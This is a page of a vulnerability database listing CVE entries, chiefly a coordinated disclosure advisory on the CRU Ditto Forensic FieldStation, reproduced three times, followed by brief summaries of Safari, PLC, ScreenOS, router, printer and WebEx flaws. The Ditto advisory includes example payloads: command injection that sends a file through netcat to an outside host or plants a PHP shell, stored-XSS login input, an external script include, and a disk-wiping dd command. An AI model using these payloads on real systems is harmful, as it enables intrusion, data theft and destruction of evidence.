VARIoT IoT vulnerabilities database
| VAR-201312-0435 | CVE-2013-6883 | CRU Ditto Forensic FieldStation Cross-site request forgery vulnerability in some firmware |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Cross-site request forgery (CSRF) vulnerability in CRU Ditto Forensic FieldStation with firmware before 2013Oct15a allows remote attackers to hijack the authentication of administrators for requests that modify the disk erase technique settings via unspecified vectors. Ditto Forensic FieldStation is prone to multiple html-injection vulnerabilities, an unspecified cross-site request-forgery vulnerability, multiple remote command-injection vulnerabilities and an authentication-bypass vulnerability.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, execute arbitrary commands in the context of the application, disclose sensitive information, perform certain administrative actions, gain unauthorized access, or bypass certain security restrictions. CRU Ditto Forensic FieldStation is a data capture and data analysis device in the WiebeTech family of American CRU company. The device clones disks and creates disk images over the network or VPN, and is capable of recording user activities for forensic analysis. A remote attacker could exploit this vulnerability to perform unauthorized operations, such as modifying disk wiping technology settings. **************************************************************
Title: Ditto Forensic FieldStation, multiple vulnerabilities
Versions affected: <= 2013Oct15a (all)
Vendor: CRU Wiebetech
Discovered by: Martin Wundram
Email: wundram@digitrace.de
Date found: 2013-04-22
Date published: 2013-12-12
Status: partially patched
**************************************************************
0] ======== Introduction / Background / Impact ========
In computer forensics (http://en.wikipedia.org/wiki/Computer_forensics) one
essential requirement is that evidence data does not get modified at all (or
not unnoticed, at least). Therefore IT forensic experts use write-blockers to
ensure a read-only access to evidence data like hard disks or USB mass
storage.
The Ditto Forensic FieldStation is such a special equipment (hardware with
embedded software) used by forensic experts to analyse and copy evidence data
in a safe and secure way. The ditto is explicitly marketed as a device to
acquire data from network file shares, too. This means it is meant to be
connected to possibly hostile networks of suspects.
However it was found to be vulnerable up to the point of not being reliable as
a computer forensic device.
1] ======== OS Command Injection ========
Class: Command Injection [CWE-77]
Impact: Code execution
Remotely Exploitable: Yes
CVE Name: CVE-2013-6881
CVSS v2 Base Score: 10
Overall CVSS v2 Score: 9.2
CVSS v2 Vector:
(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L)
Several input fields of the web application are vulnerable to OS command
injection. E.g. the application allows the setting of parameters like 'sector
size' or 'skip count' for a forensic imaging task. Because of improper
neutralization in combination with the web server running with root
privileges, an attacker is able to access and manipulate the complete system.
Example 1 (setting of 'sector size' = 1 with malicious content):
1;cat /opt/web/htdocs/index.php | nc 192.168.1.1 6666;
Example 2 (setting of 'set-size' = 1 with copying a PHP shell from
the external SD card):
1;cp /ditto/shell.php /opt/web/htdocs;
2] ======== Persistent XSS ========
Class: Cross-site Scripting [CWE-79]
Impact: Code execution
Remotely Exploitable: Yes
Status: unpatched
CVE Name: CVE-2013-6882
CVSS v2 Base Score: 9
Overall CVSS v2 Score (if patched): 9.2
CVSS v2 Vector:
(AV:N/AC:L/Au:N/C:P/I:C/A:P/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L)
Overall CVSS v2 Score (unpatched): 10
The web application suffers from multiple vulnerabilities regarding XSS. The
first one (a) is critical because an unauthorized attacker is able to push
malicious code into the system and consequently attacking every user. The
other ones (b) need authentication first.
a) The web application logs every login (including the username) in a not
sanitized way to a system log. Additionally, the web application embeds that
system log rendered as HTML into the start page of every user who successfully
logs in. Thus an unprivileged attacker can persistently inject malicious code
which attacks all users of the vulnerable system immediately after their
login.
Example:
POSTDATA=
user=demo%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
&pass=demo&login=Log+In
b) It is easily possible to submit malicious data as input into multiple HTML
form fields (e.g. one can force the system to load externally hosted
JavaScript code with <script src=http://www.hacker.tld/code.js></script>).
This can result in dangerous situations where the (external) JavaScript code
mangles the information displayed about important computer forensic key values
whose integrity is crucial.
Example:
784 PetaByte (PB) source disk instead of 32 GB, investigator "Al Capone",
"verify actions: yes" instead of "no", ...
3] ======== Cross-Site Request Forgery ========
Class: Cross-Site Request Forgery [CWE-352]
Impact: Application misuse
Remotely Exploitable: Yes
CVE Name: CVE-2013-6883
CVSS v2 Base Score: 6.6
Overall CVSS v2 Score: 8
CVSS v2 Vector:
(AV:N/AC:H/Au:N/C:P/I:C/A:P/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L)
The web application is vulnerable to attacks using Cross-Site Request Forgery.
E.g. the disk erase technique (correct settings are important for the reliable
deletion of sensitive forensic data) can be changed with a simple POST
request.
4] ======== Misconfigured Daemon Rights ========
Class: Configuration [CWE-16]
Impact: Full system access
The web server lighthttpd and the PHP engine are run as user 'root'. Thus
injection weaknesses in the 'ditto' web application result in immediate full
system access.
5] ======== Unneeded Daemons/Software ========
Class: Configuration [CWE-16]
Impact: Attackable services
Best matching CCE-ID: CCE-4268-9
Forensic usage needs only write-blocking and imaging of evidence data.
However, the base system contains further active software and services. This
helps attacking the system and escalating privileges. The tools/daemons are
especially netcat and an active SSHd. Furthermore, the SSHd binds to the
network port which is labeled as 'source' and thus intended for usage in
supposedly hostile network environments - the network containing evidence data
from suspects.
6] ======== Use of standard credentials ========
Class: Use of Hard-coded Credentials [CWE-798]
Impact: unwanted full system access
Remotely Exploitable: Yes
CVE Name: CVE-2013-6884
CVSS v2 Base Score: 10
Overall CVSS v2 Score: 9.2
CVSS v2 Vector:
(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L)
The ditto write-blocker contains a default system user named 'ditto' with the
default password 'ditto' which is allowed to elevate its user rights to root
(sudo) without further authentication. In combination with the active SSHd,
this vulnerability allows attackers full access to the ditto if it gets
connected to the same/reachable network.
7] ======== Misconfigured Core System ========
Class: Configuration [CWE-16]
Impact: Alteration of evidence data
Remotely Exploitable: Yes
Although explicitly marketed as a hardware write-blocker, the ditto does not
implement any specific write-blocking mechanism at all. The underlying system
is able to manipulate or even erase evidence on devices which are connected to
the 'source side' of the ditto. The problem is: no hardware-level, no driver-
level and no kernel-level (blockdev) write-blocking are implemented. Only the
web application prevents the user from writing to the source media. That is
just security by obscurity. Finally, every critical weakness or simple
malfunction in the web application can potentiallly lead to overwriting of
source/evidence data.
Furthermore, the embedded Linux system itself mounts the system partition as
writable. Thus malware could be persistently deployed!
Example:
One can simply overwrite supposedly write-protected source data (USB stick
and
SATA disk) with
dd if=/dev/zero of=/dev/sda.
8] ======== Solution ========
Upgrade your ditto to the newest available firmware (2013Oct15a). Don't
connect the device to potentially hostile networks. Examine your device if it
has been manipulated at an earlier time (has someone placed a backdoor in the
embedded Linux, or a malware which silently manipulates evidence data or
copies of evidence data?).
9] ======== Report Timeline ========
2013-04-22 Discovery of vulnerabilities
2013-04-23 First contact with vendor including agreement about later public
disclosure
2013-04-26 Detailed information about vulnerabilities provided to vendor
2013-06-30 Vendor fixes some vulnerabilities with firmware 2013Jun30a
2013-10-15 Vendor fixes some vulnerabilities with firmware 2013Oct15a
2013-11-26 Information with details provided to vendor about upcoming public
disclosure. Vendor gave feedback regarding technical accuracy of
this report
2013-12-12 Public disclosure
10] ======== Discussion ========
Because integrity is of utmost importance during the forensic process (correct
handling of evidence data and correct deduction of conclusions and
implications), even small vulnerabilities in forensic tools and devices become
critical.
11] ======== References ========
a)
http://www.cru-inc.com/support/software-downloads/ditto-firmware-
updates/ditto-firmware-release-notes-2013oct15a/
b)
http://www.cru-inc.com/support/software-downloads/ditto-firmware-
updates/ditto-firmware-release-notes-2013jun30a/
--
Diplom-Wirtschaftsinformatiker Martin G. Wundram
DigiTrace GmbH - Kompetenz in IT-Forensik
Gesch\xe4ftsf\xfchrer: Alexander Sigel, Martin Wundram
Registergericht K\xf6ln, HR B 72919
USt-IdNr: DE278529699
Zollstockg\xfcrtel 59, 50969 K\xf6ln
Telefon: 0221-6 77 86 95-0
Website: www.DigiTrace.de
E-Mail: info@DigiTrace.de
| VAR-201401-0273 | CVE-2013-6884 | CRU Ditto Forensic FieldStation Of firmware write-blocker Vulnerability gained in |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
The write-blocker in CRU Ditto Forensic FieldStation with firmware before 2013Oct15a has a default "ditto" username and password, which allows remote attackers to gain privileges. Ditto Forensic FieldStation is prone to multiple html-injection vulnerabilities, an unspecified cross-site request-forgery vulnerability, multiple remote command-injection vulnerabilities and an authentication-bypass vulnerability.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, execute arbitrary commands in the context of the application, disclose sensitive information, perform certain administrative actions, gain unauthorized access, or bypass certain security restrictions. CRU Ditto Forensic FieldStation is a data capture and data analysis device in the WiebeTech family of American CRU company. The device clones disks and creates disk images over the network or VPN, and is capable of recording user activities for forensic analysis. The vulnerability comes from the fact that the program uses the default username and password. A remote attacker could exploit this vulnerability to gain privileges. **************************************************************
Title: Ditto Forensic FieldStation, multiple vulnerabilities
Versions affected: <= 2013Oct15a (all)
Vendor: CRU Wiebetech
Discovered by: Martin Wundram
Email: wundram@digitrace.de
Date found: 2013-04-22
Date published: 2013-12-12
Status: partially patched
**************************************************************
0] ======== Introduction / Background / Impact ========
In computer forensics (http://en.wikipedia.org/wiki/Computer_forensics) one
essential requirement is that evidence data does not get modified at all (or
not unnoticed, at least). Therefore IT forensic experts use write-blockers to
ensure a read-only access to evidence data like hard disks or USB mass
storage.
The Ditto Forensic FieldStation is such a special equipment (hardware with
embedded software) used by forensic experts to analyse and copy evidence data
in a safe and secure way. The ditto is explicitly marketed as a device to
acquire data from network file shares, too. This means it is meant to be
connected to possibly hostile networks of suspects.
However it was found to be vulnerable up to the point of not being reliable as
a computer forensic device.
1] ======== OS Command Injection ========
Class: Command Injection [CWE-77]
Impact: Code execution
Remotely Exploitable: Yes
CVE Name: CVE-2013-6881
CVSS v2 Base Score: 10
Overall CVSS v2 Score: 9.2
CVSS v2 Vector:
(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L)
Several input fields of the web application are vulnerable to OS command
injection. E.g. the application allows the setting of parameters like 'sector
size' or 'skip count' for a forensic imaging task. Because of improper
neutralization in combination with the web server running with root
privileges, an attacker is able to access and manipulate the complete system.
Example 1 (setting of 'sector size' = 1 with malicious content):
1;cat /opt/web/htdocs/index.php | nc 192.168.1.1 6666;
Example 2 (setting of 'set-size' = 1 with copying a PHP shell from
the external SD card):
1;cp /ditto/shell.php /opt/web/htdocs;
2] ======== Persistent XSS ========
Class: Cross-site Scripting [CWE-79]
Impact: Code execution
Remotely Exploitable: Yes
Status: unpatched
CVE Name: CVE-2013-6882
CVSS v2 Base Score: 9
Overall CVSS v2 Score (if patched): 9.2
CVSS v2 Vector:
(AV:N/AC:L/Au:N/C:P/I:C/A:P/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L)
Overall CVSS v2 Score (unpatched): 10
The web application suffers from multiple vulnerabilities regarding XSS. The
first one (a) is critical because an unauthorized attacker is able to push
malicious code into the system and consequently attacking every user. The
other ones (b) need authentication first.
a) The web application logs every login (including the username) in a not
sanitized way to a system log. Additionally, the web application embeds that
system log rendered as HTML into the start page of every user who successfully
logs in. Thus an unprivileged attacker can persistently inject malicious code
which attacks all users of the vulnerable system immediately after their
login.
Example:
POSTDATA=
user=demo%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
&pass=demo&login=Log+In
b) It is easily possible to submit malicious data as input into multiple HTML
form fields (e.g. one can force the system to load externally hosted
JavaScript code with <script src=http://www.hacker.tld/code.js></script>).
This can result in dangerous situations where the (external) JavaScript code
mangles the information displayed about important computer forensic key values
whose integrity is crucial.
Example:
784 PetaByte (PB) source disk instead of 32 GB, investigator "Al Capone",
"verify actions: yes" instead of "no", ...
3] ======== Cross-Site Request Forgery ========
Class: Cross-Site Request Forgery [CWE-352]
Impact: Application misuse
Remotely Exploitable: Yes
CVE Name: CVE-2013-6883
CVSS v2 Base Score: 6.6
Overall CVSS v2 Score: 8
CVSS v2 Vector:
(AV:N/AC:H/Au:N/C:P/I:C/A:P/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L)
The web application is vulnerable to attacks using Cross-Site Request Forgery.
E.g. the disk erase technique (correct settings are important for the reliable
deletion of sensitive forensic data) can be changed with a simple POST
request.
4] ======== Misconfigured Daemon Rights ========
Class: Configuration [CWE-16]
Impact: Full system access
The web server lighthttpd and the PHP engine are run as user 'root'. Thus
injection weaknesses in the 'ditto' web application result in immediate full
system access.
5] ======== Unneeded Daemons/Software ========
Class: Configuration [CWE-16]
Impact: Attackable services
Best matching CCE-ID: CCE-4268-9
Forensic usage needs only write-blocking and imaging of evidence data.
However, the base system contains further active software and services. This
helps attacking the system and escalating privileges. The tools/daemons are
especially netcat and an active SSHd. Furthermore, the SSHd binds to the
network port which is labeled as 'source' and thus intended for usage in
supposedly hostile network environments - the network containing evidence data
from suspects.
6] ======== Use of standard credentials ========
Class: Use of Hard-coded Credentials [CWE-798]
Impact: unwanted full system access
Remotely Exploitable: Yes
CVE Name: CVE-2013-6884
CVSS v2 Base Score: 10
Overall CVSS v2 Score: 9.2
CVSS v2 Vector:
(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L)
The ditto write-blocker contains a default system user named 'ditto' with the
default password 'ditto' which is allowed to elevate its user rights to root
(sudo) without further authentication. In combination with the active SSHd,
this vulnerability allows attackers full access to the ditto if it gets
connected to the same/reachable network.
7] ======== Misconfigured Core System ========
Class: Configuration [CWE-16]
Impact: Alteration of evidence data
Remotely Exploitable: Yes
Although explicitly marketed as a hardware write-blocker, the ditto does not
implement any specific write-blocking mechanism at all. The underlying system
is able to manipulate or even erase evidence on devices which are connected to
the 'source side' of the ditto. The problem is: no hardware-level, no driver-
level and no kernel-level (blockdev) write-blocking are implemented. Only the
web application prevents the user from writing to the source media. That is
just security by obscurity. Finally, every critical weakness or simple
malfunction in the web application can potentiallly lead to overwriting of
source/evidence data.
Furthermore, the embedded Linux system itself mounts the system partition as
writable. Thus malware could be persistently deployed!
Example:
One can simply overwrite supposedly write-protected source data (USB stick
and
SATA disk) with
dd if=/dev/zero of=/dev/sda.
8] ======== Solution ========
Upgrade your ditto to the newest available firmware (2013Oct15a). Don't
connect the device to potentially hostile networks. Examine your device if it
has been manipulated at an earlier time (has someone placed a backdoor in the
embedded Linux, or a malware which silently manipulates evidence data or
copies of evidence data?).
9] ======== Report Timeline ========
2013-04-22 Discovery of vulnerabilities
2013-04-23 First contact with vendor including agreement about later public
disclosure
2013-04-26 Detailed information about vulnerabilities provided to vendor
2013-06-30 Vendor fixes some vulnerabilities with firmware 2013Jun30a
2013-10-15 Vendor fixes some vulnerabilities with firmware 2013Oct15a
2013-11-26 Information with details provided to vendor about upcoming public
disclosure. Vendor gave feedback regarding technical accuracy of
this report
2013-12-12 Public disclosure
10] ======== Discussion ========
Because integrity is of utmost importance during the forensic process (correct
handling of evidence data and correct deduction of conclusions and
implications), even small vulnerabilities in forensic tools and devices become
critical.
11] ======== References ========
a)
http://www.cru-inc.com/support/software-downloads/ditto-firmware-
updates/ditto-firmware-release-notes-2013oct15a/
b)
http://www.cru-inc.com/support/software-downloads/ditto-firmware-
updates/ditto-firmware-release-notes-2013jun30a/
--
Diplom-Wirtschaftsinformatiker Martin G. Wundram
DigiTrace GmbH - Kompetenz in IT-Forensik
Gesch\xe4ftsf\xfchrer: Alexander Sigel, Martin Wundram
Registergericht K\xf6ln, HR B 72919
USt-IdNr: DE278529699
Zollstockg\xfcrtel 59, 50969 K\xf6ln
Telefon: 0221-6 77 86 95-0
Website: www.DigiTrace.de
E-Mail: info@DigiTrace.de
| VAR-201312-0434 | CVE-2013-6882 | CRU Ditto Forensic FieldStation Firmware cross-site scripting vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Multiple cross-site scripting (XSS) vulnerabilities in CRU Ditto Forensic FieldStation with firmware 2013Oct15a and earlier allow (1) remote attackers to inject arbitrary web script or HTML via the username parameter in a login or (2) remote authenticated users to inject arbitrary web script or HTML via unspecified form fields. Ditto Forensic FieldStation is prone to multiple html-injection vulnerabilities, an unspecified cross-site request-forgery vulnerability, multiple remote command-injection vulnerabilities and an authentication-bypass vulnerability.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, execute arbitrary commands in the context of the application, disclose sensitive information, perform certain administrative actions, gain unauthorized access, or bypass certain security restrictions. CRU Ditto Forensic FieldStation is a data capture and data analysis device in the WiebeTech family of American CRU company. The device clones disks and creates disk images over the network or VPN, and is capable of recording user activities for forensic analysis. **************************************************************
Title: Ditto Forensic FieldStation, multiple vulnerabilities
Versions affected: <= 2013Oct15a (all)
Vendor: CRU Wiebetech
Discovered by: Martin Wundram
Email: wundram@digitrace.de
Date found: 2013-04-22
Date published: 2013-12-12
Status: partially patched
**************************************************************
0] ======== Introduction / Background / Impact ========
In computer forensics (http://en.wikipedia.org/wiki/Computer_forensics) one
essential requirement is that evidence data does not get modified at all (or
not unnoticed, at least). Therefore IT forensic experts use write-blockers to
ensure a read-only access to evidence data like hard disks or USB mass
storage.
The Ditto Forensic FieldStation is such a special equipment (hardware with
embedded software) used by forensic experts to analyse and copy evidence data
in a safe and secure way. The ditto is explicitly marketed as a device to
acquire data from network file shares, too. This means it is meant to be
connected to possibly hostile networks of suspects.
However it was found to be vulnerable up to the point of not being reliable as
a computer forensic device.
1] ======== OS Command Injection ========
Class: Command Injection [CWE-77]
Impact: Code execution
Remotely Exploitable: Yes
CVE Name: CVE-2013-6881
CVSS v2 Base Score: 10
Overall CVSS v2 Score: 9.2
CVSS v2 Vector:
(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L)
Several input fields of the web application are vulnerable to OS command
injection. E.g. the application allows the setting of parameters like 'sector
size' or 'skip count' for a forensic imaging task. Because of improper
neutralization in combination with the web server running with root
privileges, an attacker is able to access and manipulate the complete system.
Example 1 (setting of 'sector size' = 1 with malicious content):
1;cat /opt/web/htdocs/index.php | nc 192.168.1.1 6666;
Example 2 (setting of 'set-size' = 1 with copying a PHP shell from
the external SD card):
1;cp /ditto/shell.php /opt/web/htdocs;
2] ======== Persistent XSS ========
Class: Cross-site Scripting [CWE-79]
Impact: Code execution
Remotely Exploitable: Yes
Status: unpatched
CVE Name: CVE-2013-6882
CVSS v2 Base Score: 9
Overall CVSS v2 Score (if patched): 9.2
CVSS v2 Vector:
(AV:N/AC:L/Au:N/C:P/I:C/A:P/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L)
Overall CVSS v2 Score (unpatched): 10
The web application suffers from multiple vulnerabilities regarding XSS. The
first one (a) is critical because an unauthorized attacker is able to push
malicious code into the system and consequently attacking every user. The
other ones (b) need authentication first.
a) The web application logs every login (including the username) in a not
sanitized way to a system log. Additionally, the web application embeds that
system log rendered as HTML into the start page of every user who successfully
logs in. Thus an unprivileged attacker can persistently inject malicious code
which attacks all users of the vulnerable system immediately after their
login.
Example:
POSTDATA=
user=demo%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
&pass=demo&login=Log+In
b) It is easily possible to submit malicious data as input into multiple HTML
form fields (e.g. one can force the system to load externally hosted
JavaScript code with <script src=http://www.hacker.tld/code.js></script>).
This can result in dangerous situations where the (external) JavaScript code
mangles the information displayed about important computer forensic key values
whose integrity is crucial.
Example:
784 PetaByte (PB) source disk instead of 32 GB, investigator "Al Capone",
"verify actions: yes" instead of "no", ...
3] ======== Cross-Site Request Forgery ========
Class: Cross-Site Request Forgery [CWE-352]
Impact: Application misuse
Remotely Exploitable: Yes
CVE Name: CVE-2013-6883
CVSS v2 Base Score: 6.6
Overall CVSS v2 Score: 8
CVSS v2 Vector:
(AV:N/AC:H/Au:N/C:P/I:C/A:P/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L)
The web application is vulnerable to attacks using Cross-Site Request Forgery.
E.g. the disk erase technique (correct settings are important for the reliable
deletion of sensitive forensic data) can be changed with a simple POST
request.
4] ======== Misconfigured Daemon Rights ========
Class: Configuration [CWE-16]
Impact: Full system access
The web server lighthttpd and the PHP engine are run as user 'root'. Thus
injection weaknesses in the 'ditto' web application result in immediate full
system access.
5] ======== Unneeded Daemons/Software ========
Class: Configuration [CWE-16]
Impact: Attackable services
Best matching CCE-ID: CCE-4268-9
Forensic usage needs only write-blocking and imaging of evidence data.
However, the base system contains further active software and services. This
helps attacking the system and escalating privileges. The tools/daemons are
especially netcat and an active SSHd. Furthermore, the SSHd binds to the
network port which is labeled as 'source' and thus intended for usage in
supposedly hostile network environments - the network containing evidence data
from suspects.
6] ======== Use of standard credentials ========
Class: Use of Hard-coded Credentials [CWE-798]
Impact: unwanted full system access
Remotely Exploitable: Yes
CVE Name: CVE-2013-6884
CVSS v2 Base Score: 10
Overall CVSS v2 Score: 9.2
CVSS v2 Vector:
(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L)
The ditto write-blocker contains a default system user named 'ditto' with the
default password 'ditto' which is allowed to elevate its user rights to root
(sudo) without further authentication. In combination with the active SSHd,
this vulnerability allows attackers full access to the ditto if it gets
connected to the same/reachable network.
7] ======== Misconfigured Core System ========
Class: Configuration [CWE-16]
Impact: Alteration of evidence data
Remotely Exploitable: Yes
Although explicitly marketed as a hardware write-blocker, the ditto does not
implement any specific write-blocking mechanism at all. The underlying system
is able to manipulate or even erase evidence on devices which are connected to
the 'source side' of the ditto. The problem is: no hardware-level, no driver-
level and no kernel-level (blockdev) write-blocking are implemented. Only the
web application prevents the user from writing to the source media. That is
just security by obscurity. Finally, every critical weakness or simple
malfunction in the web application can potentiallly lead to overwriting of
source/evidence data.
Furthermore, the embedded Linux system itself mounts the system partition as
writable. Thus malware could be persistently deployed!
Example:
One can simply overwrite supposedly write-protected source data (USB stick
and
SATA disk) with
dd if=/dev/zero of=/dev/sda.
8] ======== Solution ========
Upgrade your ditto to the newest available firmware (2013Oct15a). Don't
connect the device to potentially hostile networks. Examine your device if it
has been manipulated at an earlier time (has someone placed a backdoor in the
embedded Linux, or a malware which silently manipulates evidence data or
copies of evidence data?).
9] ======== Report Timeline ========
2013-04-22 Discovery of vulnerabilities
2013-04-23 First contact with vendor including agreement about later public
disclosure
2013-04-26 Detailed information about vulnerabilities provided to vendor
2013-06-30 Vendor fixes some vulnerabilities with firmware 2013Jun30a
2013-10-15 Vendor fixes some vulnerabilities with firmware 2013Oct15a
2013-11-26 Information with details provided to vendor about upcoming public
disclosure. Vendor gave feedback regarding technical accuracy of
this report
2013-12-12 Public disclosure
10] ======== Discussion ========
Because integrity is of utmost importance during the forensic process (correct
handling of evidence data and correct deduction of conclusions and
implications), even small vulnerabilities in forensic tools and devices become
critical.
11] ======== References ========
a)
http://www.cru-inc.com/support/software-downloads/ditto-firmware-
updates/ditto-firmware-release-notes-2013oct15a/
b)
http://www.cru-inc.com/support/software-downloads/ditto-firmware-
updates/ditto-firmware-release-notes-2013jun30a/
--
Diplom-Wirtschaftsinformatiker Martin G. Wundram
DigiTrace GmbH - Kompetenz in IT-Forensik
Gesch\xe4ftsf\xfchrer: Alexander Sigel, Martin Wundram
Registergericht K\xf6ln, HR B 72919
USt-IdNr: DE278529699
Zollstockg\xfcrtel 59, 50969 K\xf6ln
Telefon: 0221-6 77 86 95-0
Website: www.DigiTrace.de
E-Mail: info@DigiTrace.de
| VAR-201312-0485 | CVE-2013-7127 | Apple Mac OS X Run on Safari Vulnerability in which important information is obtained |
CVSS V2: 2.1 CVSS V3: - Severity: LOW |
Apple Safari 6.0.5 on Mac OS X 10.7.5 and 10.8.5 stores cleartext credentials in LastSession.plist, which allows local users to obtain sensitive information by reading this file. Apple Safari is prone to an information-disclosure vulnerability.
Successful exploits may allow attackers to gain access to sensitive information. Information obtained may lead to further attacks. Apple Apple Safari is a web browser developed by Apple (Apple), and is the default browser included with Mac OS X and iOS operating systems
| VAR-201312-0501 | CVE-2013-7059 | Nano-10 PLC Remote Denial of Service Vulnerability (CNVD-2013-15610) |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The Nano-10 PLC is a programmable logic controller. A remote denial of service vulnerability exists in the implementation of the Nano-10 PLC r82. An attacker could exploit this vulnerability to cause the affected device to crash.
Nano-10 PLC running firmware prior to r82 are vulnerable. ** ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided
| VAR-201312-0247 | CVE-2013-6958 | Juniper ScreenOS vulnerable to denial-of-service (DoS) |
CVSS V2: 7.1 CVSS V3: - Severity: HIGH |
Juniper NetScreen Firewall running ScreenOS 5.4, 6.2, or 6.3, when the Ping of Death screen is disabled, allows remote attackers to cause a denial of service via a crafted packet. ScreenOS provided by Juniper Networks contains a denial-of-service (DoS) vulnerability. Shuichiro Suzuki of FFRI, Inc. reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.When processing a malicious packet, the device may hang. ScreenOS is prone to an unspecified denial-of-service vulnerability.
Successful exploits may allow the attacker to cause denial-of-service conditions.
ScreenOS 5.4, 6.2.0, and 6.3.0 are vulnerable. Juniper Networks NetScreen Firewall running Juniper ScreenOS is an operating system of Juniper Networks (Juniper Networks) that runs on NetScreen series firewalls. ##############################################################
FFRI, Inc.
=== Reference ===
CVE No. : CVE-2013-6958
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6958
Mozilla Foundation Security Advisory :
https://www.mozilla.org/security/announce/2013/mfsa2013-33.html
FFRI Advisory URL:
http://www.ffri.jp/cgi-bin/advisory/advisory.cgi?type=release&id=FFRRA-20131213
=== About FFRI ===
FFRI is a leading security products and service vendor in Japan
providing innovative security software and vulnerability research
information. Our commitment is to secure our IT-driven society by
protecting information system from unpredictable threats.
http://www.ffri.jp
research-feedback@ffri.jp
=== Copyright ===
2007 - 2014 FFRI, Inc. All rights reserved
| VAR-201402-0569 | No CVE | Huawei B593u-12 and T-Mobile HOME NET Router have multiple vulnerabilities |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Huawei B593u-12 and T-Mobile HOME NET Router are both wireless router products. Huawei B593u-12 and T-Mobile HOME NET Router have information disclosure vulnerabilities, security restriction bypass vulnerabilities, command injection vulnerabilities, directory traversal vulnerabilities, and cross-site request forgery vulnerabilities. A remote attacker can obtain sensitive information, perform administrator actions, bypass security restrictions, access arbitrary files, execute arbitrary commands, and gain unauthorized access to affected devices. An information-disclosure vulnerability
2. A security-bypass vulnerability
3. A command-injection vulnerability
4. A directory-traversal vulnerability.
5. Other attacks are also possible
| VAR-201312-0062 | CVE-2013-2813 | plural Cooper Power Systems Product of DNP3 Service disruption in components (DoS) Vulnerabilities |
CVSS V2: 7.1 CVSS V3: - Severity: HIGH |
The DNP3 component in Cooper Power Systems SMP 4, 4/DP, and 16 gateways allows remote attackers to cause a denial of service (reboot or link outage) via a crafted DNP3 TCP packet. Cooper Power Systems The SMP Gateway is a data concentrator deployed in the energy sector.
Attackers can exploit this issue to force the application to reboot, causing denial-of-service conditions. The device can collect and store field instrument data in real time, and transmit it to the remote monitoring center
| VAR-201312-0064 | CVE-2013-2816 | plural Cooper Power Systems Product of DNP3 Service disruption in components (DoS) Vulnerabilities |
CVSS V2: 4.7 CVSS V3: - Severity: MEDIUM |
The DNP3 component in Cooper Power Systems SMP 4, 4/DP, and 16 gateways allows physically proximate attackers to cause a denial of service (reboot or link outage) via crafted input over a serial line. Cooper Power Systems The SMP Gateway is a data concentrator deployed in the energy sector.
Attackers can exploit this issue to force the application to reboot; causing denial-of-service conditions. The device can collect and store field instrument data in real time, and transmit it to the remote monitoring center
| VAR-201312-0406 | CVE-2013-6193 | plural HP LaserJet Service operation interruption in printer products (DoS) Vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Unspecified vulnerability on HP LaserJet M1522n and M2727; LaserJet Pro 100, 300, 400, CM1415fnw, CP1*, M121*, M1536dnf, and P1*; Color LaserJet CM* and CP*; and TopShot LaserJet Pro M275 printers allows remote attackers to cause a denial of service via unknown vectors. plural HP LaserJet Printer products have service disruption (DoS) There are vulnerabilities that are put into a state.Service disruption by a third party (DoS) There is a possibility of being put into a state. HP LaserJet Printers is a family of laser printers developed by Hewlett Packard.
Exploiting this issue allows remote attackers to trigger denial-of-service conditions. HP LaserJet M1522n, etc. are all multifunctional printer products of Hewlett-Packard (HP) in the United States. Security flaws exist in several HP products
| VAR-201312-0255 | CVE-2013-6966 | Cisco WebEx Training Center Open redirect vulnerability |
CVSS V2: 5.8 CVSS V3: - Severity: MEDIUM |
Open redirect vulnerability in Cisco WebEx Training Center allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors, aka Bug ID CSCul36031.
An attacker can leverage this issue by constructing a crafted URI and enticing a user to follow it. When an unsuspecting victim follows the link, they may be redirected to an attacker-controlled site; this may aid in phishing attacks. Other attacks are possible.
This issue is being tracked by Cisco Bug ID CSCul36031. The program provides a wealth of tools for online classrooms, online training, and online exams
| VAR-201312-0457 | CVE-2013-6709 | Cisco WebEx Training Center Vulnerability that bypasses access restrictions in registered components |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The registration component in Cisco WebEx Training Center provides the training-session URL before payment is completed, which allows remote attackers to bypass intended access restrictions and join an audio conference by entering credential fields from this URL, aka Bug ID CSCul57111. Cisco WebEx Training Center is prone to multiple information-disclosure vulnerabilities.
